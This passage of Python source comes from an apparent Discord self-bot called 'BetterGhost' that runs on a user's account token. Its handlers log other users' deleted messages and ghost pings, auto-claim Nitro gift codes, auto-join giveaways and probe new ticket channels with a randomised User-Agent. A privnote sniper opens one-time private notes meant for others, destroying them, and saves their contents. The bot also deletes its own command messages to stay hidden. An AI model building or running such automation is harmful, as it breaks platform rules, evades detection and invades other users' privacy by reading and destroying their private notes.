        print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "bear" (resizes the Windows console first) ---
    if consoleMode.lower() == "bear":
        if is_windows():
            os.system("mode con: cols=90 lines=24")
        print("")
        print(fg.consoleColour + "")
        print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
        print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
        print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
        print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
        print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
        print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
        print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
        print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
        print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
        print("")
        print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
        print(fg.consoleColour + '─'*os.get_terminal_size().columns)
        print("")
    # --- banner: "old" / fallback for unknown modes (same elif chain as "bear") ---
    elif consoleMode.lower() == "old":
        print("")
        print(fg.consoleColour + "")
        print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
        print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
        print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
        print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
        print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
        print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
        print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
        print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
        print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    elif consoleMode not in consoleModes:
        print("")
        print(fg.consoleColour + "")
        print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
        print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
        print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
        print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
        print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
        print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "react" ---
    if consoleMode.lower() == "react":
        print("")
        print(fg.consoleColour + "")
        print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
        print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
        print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
        print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
        print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
        print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "rise" (includes a live connection summary line) ---
    if consoleMode.lower() == "rise":
        print(fg.cBlue + "")
        print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██║ ███████╗██████╗ ██████╗ ████████╗".center(width))
        print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
        print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
        print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
        print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
        print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
        print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
        print(fg.cGrey + f"Connected: {BetterGhost.user} | Prefix: {BetterGhost.command_prefix} | Servers: {len(BetterGhost.guilds)}".center(width))
        print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
        print("")
        print(fg.cBlue + '━'*width)
        print("")
    # --- banner: "nighty" (two-tone, resizes the Windows console first) ---
    if consoleMode.lower() == "nighty":
        if is_windows():
            os.system("mode con: cols=90 lines=24")
        print("")
        print(f" {fg.cWhite}███{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}████████{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗")
        print(f" {fg.cWhite}████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔════╝ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║╚══{fg.cWhite}██{fg.consoleColour}╔══╝╚{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╔╝")
        print(f" {fg.cWhite}██{fg.consoleColour}╔{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}███{fg.consoleColour}╗{fg.cWhite}███████{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}╔╝ ")
        print(f" {fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔══{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}██{fg.consoleColour}╔╝ ")
        print(f" {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██████{fg.consoleColour}╔╝{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ")
        print(fg.consoleColour + f" ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ")
        print("")
        print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
        print(f"{fg.cWhite}Account: {BetterGhost.user} [{len(BetterGhost.guilds)} servers] [{len(get_friends(__token__))} friends]")
        print(f"{fg.cWhite}Prefix: {BetterGhost.command_prefix}")
        print(fg.cWhite + '─'*os.get_terminal_size().columns)
    # def getCurrentTime():
    # return datetime.now().strftime("%H:%M")
    # def print_important(message):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
    # def print_info(message):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
    # def print_cmd(command):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {BetterGhost.command_prefix}{command}")
    # def print_sharecmd(author, command):
    # print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
    # def print_error(error):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
    # def print_detect(message):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
    # def print_sniper(message):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
    # def print_sniper_info(firstmessage, secondmessage):
    # print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
    # Warn pre-release users.
    if "beta" in version.lower():
        print_important("You're currently using a beta build of BetterGhost.")
        print_important("If you notice any bugs please report them to the developer.")
        print(" ")
    elif "dev" in version.lower():
        print_important("You're currently using a developer build of BetterGhost.")
        print_important("If you notice any bugs please report them to the developer.")
        print(" ")
    # Login counter, stored base64-encoded in data/logins.txt (obfuscation,
    # not security): create at "1" on first run, otherwise decode, increment,
    # re-encode and write back.
    if not os.path.isfile('data/logins.txt'):
        message = "1"
        message_bytes = message.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')
        f = open('data/logins.txt', "w")
        f.write(base64_message)
        f.close()
    else:
        f = open('data/logins.txt', "r")
        loginsdata = f.read()
        base64_message = loginsdata
        base64_bytes = base64_message.encode('ascii')
        message_bytes = base64.b64decode(base64_bytes)
        message = message_bytes.decode('ascii')
        logindata = int(message)+1
        logindata_str = str(logindata)
        logindata_bytes = logindata_str.encode('ascii')
        base64_bytes = base64.b64encode(logindata_bytes)
        base64_logindata = base64_bytes.decode('ascii')
        f = open('data/logins.txt', "w")
        f.write(f"{base64_logindata}")
        f.close()
    print_info(f"BetterGhost can now be used with {BetterGhost.command_prefix} prefix.")
    send_notification("BetterGhost", "Successfully connected!", 10)
    # Signal the other event handlers that startup is complete.
    global __ghostloaded__
    __ghostloaded__ = True
    if Config.getConfig()["sounds"]:
        if str(sounddevice.query_devices()) != "":
            pygame.mixer.music.load(resource_path("sounds/connected.mp3"))
            pygame.mixer.music.play(1)
    # Optional rich presence: pushes the configured presence 10 times with a
    # 2s pause between updates, pumping the RPC connection each iteration.
    if json.load(open("richpresence.json"))["enabled"] == True:
        def readyCallback(current_user):
            print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been enabled.")
        def disconnectedCallback(codeno, codemsg):
            print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been disabled.")
        def errorCallback(errno, errmsg):
            print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}An error happend.")
        callbacks = {'ready': readyCallback,'disconnected': disconnectedCallback,'error': errorCallback}
        discord_rpc.initialize(str(json.load(open("richpresence.json"))["client_id"]), callbacks=callbacks, log=False)
        for i in range(10):
            discord_rpc.update_presence(**{
                'details': json.load(open("richpresence.json"))["details"].replace("{version}", version),
                'state': json.load(open("richpresence.json"))["state"].replace("{version}", version),
                'start_timestamp': time.time(),
                'large_image_key': json.load(open("richpresence.json"))["large_image_key"],
                'large_image_text': json.load(open("richpresence.json"))["large_image_text"],
                'small_image_key': json.load(open("richpresence.json"))["small_image_key"],
                'small_image_text': json.load(open("richpresence.json"))["small_image_text"]
            })
            discord_rpc.update_connection()
            await asyncio.sleep(2)
            discord_rpc.run_callbacks()
async def get_message(ctx, id):
    """Find a message by *id* in the context channel's history.

    Returns the matching message, or ``None`` when no message has that id
    (the original fell off the end of the loop and raised
    UnboundLocalError on ``msg``).
    """
    # NOTE(review): pulling the entire history is O(channel size);
    # ``ctx.channel.fetch_message(id)`` would be a single API call —
    # confirm the installed discord.py fork supports it before switching.
    channelMsgHistory = await ctx.channel.history(limit=999999999).flatten()
    for message in channelMsgHistory:
        if message.id == id:
            return message
    return None
@BetterGhost.event
async def on_error(event):
    """Log any event-handler failure (discord.py passes the event name) and
    swallow it so the bot keeps running."""
    logging.error(str(event))
@BetterGhost.event
async def on_command(ctx):
    """Delete the invoking message (self-bot stealth) and log the command."""
    try:
        await ctx.message.delete()
    except:
        # Deletion can fail (already gone / no permission); best-effort only.
        pass
    print_cmd(f"{ctx.command.name}")
@BetterGhost.event
async def on_command_error(ctx, error):
    """Log every command error; print it to the console unless it is just an
    unknown command.  In both cases the invoking message is deleted
    (best-effort) to keep the self-bot inconspicuous."""
    logging.error(str(error))
    if isinstance(error, commands.CommandNotFound):
        try:
            await ctx.message.delete()
        except:
            pass
    else:
        print_error(f"{error}")
        try:
            await ctx.message.delete()
        except:
            pass
@BetterGhost.event
async def on_message_delete(message):
    """Report deleted messages and ghost pings to the console, with optional
    sound/desktop notification and webhook mirror for ghost pings.

    NOTE(review): ``message.guild.id`` is read unguarded — for a deleted
    DM message ``guild`` is presumably None and this would raise
    AttributeError (caught by the global on_error hook); confirm intended.
    """
    if __ghostloaded__:
        if Config.getConfig()["detections"]["deletedmessages"]:
            if message.guild.id not in __ignoredservers__["deletedmessages"]:
                print_detect("Deleted Message")
                print_sniper_info("Content", message.content)
                print_sniper_info("Author", str(message.author))
                try:
                    print_sniper_info("Channel", str(message.channel))
                except:
                    pass
                try:
                    print_sniper_info("Guild", str(message.guild.name))
                except:
                    pass
        if Config.getConfig()["detections"]["ghostping"]:
            # A deleted message that mentioned us is a ghost ping.
            if BetterGhost.user.mentioned_in(message):
                if message.guild.id not in __ignoredservers__["ghostpings"]:
                    print_detect("BetterGhost Ping")
                    print_sniper_info("Content", str(message.content))
                    print_sniper_info("Author", str(message.author))
                    try:
                        print_sniper_info("Channel", str(message.channel))
                    except:
                        pass
                    try:
                        print_sniper_info("Guild", str(message.guild.name))
                    except:
                        pass
                    if Config.getConfig()["sounds"]:
                        if str(sounddevice.query_devices()) != "":
                            pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                            pygame.mixer.music.play(1)
                    send_notification("BetterGhost Ping", f"You were ghost pinged in {message.guild} by {message.author}.", 10)
                    if __ghostpingwebhook__ != "":
                        webhook = DiscordWebhook(url=__ghostpingwebhook__)
                        embed = DiscordEmbed(title='BetterGhost Ping', color=__embedcolourraw__[1:], description=f"`{message.author}` ghost pinged you in `{message.channel}` (`{message.guild}`)")
                        embed.set_thumbnail(url=__embedimage__)
                        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                        embed.set_timestamp()
                        webhook.add_embed(embed)
                        response = webhook.execute()
@BetterGhost.event
async def on_member_ban(guild, user):
    """Report bans in any visible guild; add sound + desktop notification
    when the banned user is this account."""
    if __ghostloaded__:
        if Config.getConfig()["detections"]["bans"]:
            if guild.id not in __ignoredservers__["bans"]:
                print_detect("Banned")
                print_sniper_info("Member", f"{user}")
                print_sniper_info("Member ID", f"{user.id}")
                print_sniper_info("Guild", f"{guild.name}")
                # Extra alert only when *we* are the banned user.
                if str(BetterGhost.user) == str(user):
                    if Config.getConfig()["sounds"]:
                        if str(sounddevice.query_devices()) != "":
                            pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                            pygame.mixer.music.play(1)
                    send_notification("Ban Detect", f"You were banned in {guild.name}.", 10)
@BetterGhost.event
async def on_guild_remove(guild):
    """Report leaving/being removed from a guild, optionally mirroring the
    details to the configured webhook."""
    if __ghostloaded__:
        if Config.getConfig()["detections"]["guildleave"]:
            if guild.id not in __guildleaveignoredservers__:
                print_detect("Guild Left")
                print_sniper_info("Name", guild.name)
                print_sniper_info("ID", guild.id)
                print_sniper_info("Owner", guild.owner)
                if __guildleavewebhook__ != "":
                    webhook = DiscordWebhook(url=__guildleavewebhook__)
                    # [1:] strips the leading '#' from the hex colour string.
                    embed = DiscordEmbed(title='Guild Leave Detection', color=__embedcolourraw__[1:])
                    embed.set_thumbnail(url=__embedimage__)
                    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                    embed.set_timestamp()
                    embed.add_embed_field(name='Name', value=str(guild.name), inline=False)
                    embed.add_embed_field(name='ID', value=str(guild.id), inline=False)
                    embed.add_embed_field(name='Owner', value=str(guild.owner), inline=False)
                    webhook.add_embed(embed)
                    response = webhook.execute()
@BetterGhost.event
async def on_webhooks_update(channel):
    """Report webhook create/update/delete activity in a guild channel."""
    if __ghostloaded__:
        if Config.getConfig()["detections"]["webhookmodification"]:
            if channel.guild.id not in __ignoredservers__["webhookmodifications"]:
                print_detect("Webhook Modification")
                try:
                    print_sniper_info("Server", channel.guild.name)
                except:
                    pass
                try:
                    print_sniper_info("Channel", channel.name)
                except:
                    pass
@BetterGhost.event
async def on_relationship_add(relationship):
    """Report incoming friend requests and newly-added friends.

    Bug fixes vs. the original:
    - ``isinstance(relationship.type, <enum member>)`` raises TypeError
      because an enum *member* is not a class; the checks are now equality
      comparisons against ``discord.RelationshipType``.
    - The new-friend webhook embed reused the copy-pasted title
      'Incoming Friend Request'; it now says 'New Friend'.
    """
    if __ghostloaded__:
        if Config.getConfig()["detections"]["friendsupdate"]:
            user_tag = relationship.user.name + "#" + relationship.user.discriminator
            def _post_webhook(title):
                # Mirror the detection to the configured friends webhook.
                webhook = DiscordWebhook(url=__friendsupdatewebhook__)
                embed = DiscordEmbed(title=title, color=__embedcolourraw__[1:])
                embed.set_thumbnail(url=__embedimage__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.set_timestamp()
                embed.add_embed_field(name='User', value=user_tag, inline=False)
                embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
                webhook.add_embed(embed)
                webhook.execute()
            if relationship.type == discord.RelationshipType.incoming_request:
                print_detect("Incoming Friend Request")
                print_sniper_info("User", user_tag)
                print_sniper_info("ID", relationship.user.id)
                if __friendsupdatewebhook__ != "":
                    _post_webhook('Incoming Friend Request')
            if relationship.type == discord.RelationshipType.friend:
                print_detect("New Friend")
                print_sniper_info("User", user_tag)
                print_sniper_info("ID", relationship.user.id)
                if __friendsupdatewebhook__ != "":
                    _post_webhook('New Friend')
@BetterGhost.event
async def on_relationship_remove(relationship):
    """Report outgoing-request cancellations, blocks, and removed friends.

    Bug fix: the original used ``isinstance(relationship.type, <enum
    member>)``, which raises TypeError because an enum member is not a
    class; the checks are now equality comparisons against
    ``discord.RelationshipType``.
    """
    if __ghostloaded__:
        if Config.getConfig()["detections"]["friendsupdate"]:
            user_tag = relationship.user.name + "#" + relationship.user.discriminator
            def _post_webhook(title):
                # Mirror the detection to the configured friends webhook.
                webhook = DiscordWebhook(url=__friendsupdatewebhook__)
                embed = DiscordEmbed(title=title, color=__embedcolourraw__[1:])
                embed.set_thumbnail(url=__embedimage__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.set_timestamp()
                embed.add_embed_field(name='User', value=user_tag, inline=False)
                embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
                webhook.add_embed(embed)
                webhook.execute()
            if relationship.type == discord.RelationshipType.outgoing_request:
                print_detect("Outgoing Friend Request")
                print_sniper_info("User", user_tag)
                print_sniper_info("ID", relationship.user.id)
                if __friendsupdatewebhook__ != "":
                    _post_webhook('Outgoing Friend Request')
            if relationship.type == discord.RelationshipType.blocked:
                print_detect("Blocked User")
                print_sniper_info("User", user_tag)
                print_sniper_info("ID", relationship.user.id)
                if __friendsupdatewebhook__ != "":
                    _post_webhook('Blocked User')
            if relationship.type == discord.RelationshipType.friend:
                print_detect("Removed Friend")
                print_sniper_info("User", user_tag)
                print_sniper_info("ID", relationship.user.id)
                if __friendsupdatewebhook__ != "":
                    _post_webhook('Removed Friend')
@BetterGhost.event
async def on_typing(channel, user, when):
    """Report when someone starts typing in a DM with this account, with
    optional sound, desktop notification, and webhook mirror."""
    if __ghostloaded__:
        # Only DM channels are of interest; guild typing is ignored.
        if isinstance(channel, discord.DMChannel):
            if Config.getConfig()["detections"]["dmtyping"]:
                print_detect(f"DM Typing")
                print_sniper_info("User", user)
                if Config.getConfig()["sounds"]:
                    if str(sounddevice.query_devices()) != "":
                        pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                        pygame.mixer.music.play(1)
                send_notification("DM Typing", f"{user} is typing in their DMs.", 10)
                if __dmtypingwebhook__ != "":
                    webhook = DiscordWebhook(url=__dmtypingwebhook__)
                    embed = DiscordEmbed(title='DM Typing', color=__embedcolourraw__[1:])
                    embed.set_thumbnail(url=__embedimage__)
                    embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                    embed.set_timestamp()
                    embed.add_embed_field(name='User', value=str(user), inline=False)
                    embed.add_embed_field(name='ID', value=str(user.id), inline=False)
                    embed.add_embed_field(name='When', value=str(when), inline=False)
                    webhook.add_embed(embed)
                    response = webhook.execute()
@BetterGhost.event
async def on_guild_channel_create(channel):
    """Ticket sniper: flag newly-created channels whose name contains
    "ticket" that this account can actually see.

    The direct API GET on the channel (with a randomised User-Agent)
    serves as a visibility probe — a 200 means we have access.
    """
    if __ghostloaded__:
        if Config.getConfig()["snipers"]["tickets"]:
            if "ticket" in channel.name:
                if channel.guild.id not in __ignoredservers__["tickets"]:
                    if str(channel.type).lower() != "category":
                        request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
                        if request.status_code == 200:
                            print_sniper("Ticket")
                            try:
                                print_sniper_info("Server", channel.guild.name)
                            except:
                                pass
                            try:
                                print_sniper_info("Channel", channel.name)
                            except:
                                pass
                            if Config.getConfig()["sounds"]:
                                if str(sounddevice.query_devices()) != "":
                                    pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                    pygame.mixer.music.play(1)
                            send_notification("Ticket Sniper", f"{channel.name} was created in {channel.guild.name}.", 10)
                            if __ticketswebhook__ != "":
                                webhook = DiscordWebhook(url=__ticketswebhook__)
                                embed = DiscordEmbed(title='Ticket', color=__embedcolourraw__[1:])
                                embed.set_thumbnail(url=__embedimage__)
                                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                                embed.set_timestamp()
                                try:
                                    embed.add_embed_field(name='Server', value=str(channel.guild.name), inline=False)
                                except:
                                    pass
                                try:
                                    embed.add_embed_field(name='Channel', value=str(channel.name), inline=False)
                                except:
                                    pass
                                webhook.add_embed(embed)
                                response = webhook.execute()
@BetterGhost.event
async def on_message(message):
    """Central message hook.

    For messages from OTHER users: AFK auto-reply (DMs), nitro-gift sniper,
    privnote sniper, giveaway sniper, and selfbot detection.
    For OUR OWN messages: custom commands from customcommands.json and
    optional uwuify editing. Finally, normal command processing.

    NOTE(review): indentation was reconstructed from a whitespace-mangled
    source — verify nesting against the canonical file before relying on it.
    """
    if __ghostloaded__:
        messageSendTime = datetime.now()  # start time, used to report "Snipe Speed"
        if message.author.id != BetterGhost.user.id:
            # --- AFK auto-reply (direct messages only) ---
            if afkMode:
                if isinstance(message.channel, discord.DMChannel):
                    await message.channel.send(CONFIG["afkmode"]["replymessage"])
            # --- Nitro gift sniper ---
            if Config.getConfig()["snipers"]["nitro"]:
                if "discord.gift/" in message.content:
                    if message.guild.id not in __ignoredservers__["nitro"]:
                        giftLink = ""
                        code = ""
                        # Extract the last gift link (and its code) from the message.
                        for item in message.content.split(" "):
                            if "discord.gift/" in item:
                                giftLink = item
                                code = giftLink.replace("discord.gift/", "")
                        print_sniper("Nitro")
                        print_sniper_info("Link", giftLink)
                        print_sniper_info("Author", message.author)
                        # Guild/channel names are best-effort; failures are ignored.
                        try:
                            print_sniper_info("Server", message.guild.name)
                        except:
                            pass
                        try:
                            print_sniper_info("Channel", message.channel.name)
                        except:
                            pass
                        nitroStatus = claim_nitro(code, __token__)
                        print_sniper_info("Status", nitroStatus)
                        print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
                        if __nitrowebhook__ != "":
                            webhook = DiscordWebhook(url=__nitrowebhook__)
                            embed = DiscordEmbed(title='Nitro Sniper', color=__embedcolourraw__[1:])
                            embed.set_thumbnail(url=__embedimage__)
                            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                            embed.set_timestamp()
                            embed.add_embed_field(name='Author', value=str(message.author), inline=False)
                            embed.add_embed_field(name='Gift Link', value=giftLink, inline=False)
                            embed.add_embed_field(name='Nitro Status', value=nitroStatus, inline=False)
                            embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
                            webhook.add_embed(embed)
                            response = webhook.execute()
                        if nitroStatus == "Valid Code":
                            if Config.getConfig()["sounds"]:
                                if str(sounddevice.query_devices()) != "":  # only if an audio device exists
                                    pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                    pygame.mixer.music.play(1)
                            send_notification("Nitro Sniper", "Sniped a nitro gift code!", 10)
            # --- Privnote sniper: reading a privnote destroys it for everyone else ---
            if Config.getConfig()["snipers"]["privnote"]:
                if "privnote.com/" in message.content:
                    if message.guild.id not in __ignoredservers__["privnote"]:
                        privnoteLink = ""
                        fid = datetime.now().strftime("%m_%d_%Y-%H_%M_%S")  # timestamped save-file name
                        for item in message.content.split(" "):
                            if "privnote.com/" in item:
                                privnoteLink = item
                        print_sniper("Privnote")
                        print_sniper_info("Link", privnoteLink)
                        print_sniper_info("Author", message.author)
                        try:
                            print_sniper_info("Server", message.guild.name)
                        except:
                            pass
                        try:
                            print_sniper_info("Channel", message.channel.name)
                        except:
                            pass
                        try:
                            content = read_privnote(privnoteLink)
                            file = open(f"privnote-saves/{fid}.txt", "w")
                            file.write(f"Privnote sent by {message.author} in #{message.channel.name}, {message.guild.name}.\nSniped at {fid}.\n \n{content}")
                            file.close()
                            print_sniper_info("Content", content)
                            if Config.getConfig()["sounds"]:
                                if str(sounddevice.query_devices()) != "":
                                    pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                    pygame.mixer.music.play(1)
                            send_notification("Privnote Sniper", "Sniped a privnote note!", 10)
                        except:
                            # read_privnote raises once the one-time note has been consumed
                            print_sniper_info("Failed", "Note already been read.")
                        print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
                        if __privnotewebhook__ != "":
                            webhook = DiscordWebhook(url=__privnotewebhook__)
                            embed = DiscordEmbed(title='Privnote Sniper', color=__embedcolourraw__[1:])
                            embed.set_thumbnail(url=__embedimage__)
                            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                            embed.set_timestamp()
                            embed.add_embed_field(name='Author', value=str(message.author), inline=False)
                            embed.add_embed_field(name='Privnote Link', value=privnoteLink, inline=False)
                            try:
                                # NameError if the note could not be read (content never assigned)
                                embed.add_embed_field(name='Content', value=content, inline=False)
                            except:
                                embed.add_embed_field(name='Failed', value="Note already been read.", inline=False)
                            embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
                            webhook.add_embed(embed)
                            response = webhook.execute()
            # --- Giveaway sniper: auto-join giveaways posted by known giveaway bots ---
            if Config.getConfig()["snipers"]["giveaway"]:
                if message.embeds:
                    messageEmbed = discord.Embed.to_dict(message.embeds[0])
                    if int(message.author.id) in giveawayBots and message.author.bot:
                        isGiveaway = False
                        if "giveaway" in message.content.lower() or "giveaway" in json.dumps(messageEmbed).lower():
                            isGiveaway = True
                        if isGiveaway:
                            if message.guild.id not in __ignoredservers__["giveaways"]:
                                embed = message.embeds[0].to_dict()
                                prize = embed["author"]["name"]
                                # Skip bait giveaways whose "prize" is a punishment.
                                if "ban" in prize.lower() or "kick" in prize.lower() or "mute" in prize.lower() or "punish" in prize.lower():
                                    print_sniper("Giveaway")
                                    print_sniper_info("Prize", prize)
                                    print_sniper_info("Skipped", "Sus prize.")
                                    try:
                                        print_sniper_info("Server", message.guild.name)
                                    except:
                                        pass
                                    try:
                                        print_sniper_info("Channel", message.channel.name)
                                    except:
                                        pass
                                    if Config.getConfig()["sounds"]:
                                        if str(sounddevice.query_devices()) != "":
                                            pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
                                            pygame.mixer.music.play(1)
                                    send_notification("Giveaway Sniper", f"Giveaway skipped because of sus prize.", 10)
                                else:
                                    print_sniper("Giveaway")
                                    print_sniper_info("Prize", prize)
                                    try:
                                        print_sniper_info("Server", message.guild.name)
                                    except:
                                        pass
                                    try:
                                        print_sniper_info("Channel", message.channel.name)
                                    except:
                                        pass
                                    if __giveawaywebhook__ != "":
                                        webhook = DiscordWebhook(url=__giveawaywebhook__)
                                        embed = DiscordEmbed(title='Giveaway Sniper', description=f"Sniped a giveaway for `{prize}` in `{message.guild.name}`.", color=__embedcolourraw__[1:])
                                        embed.set_thumbnail(url=__embedimage__)
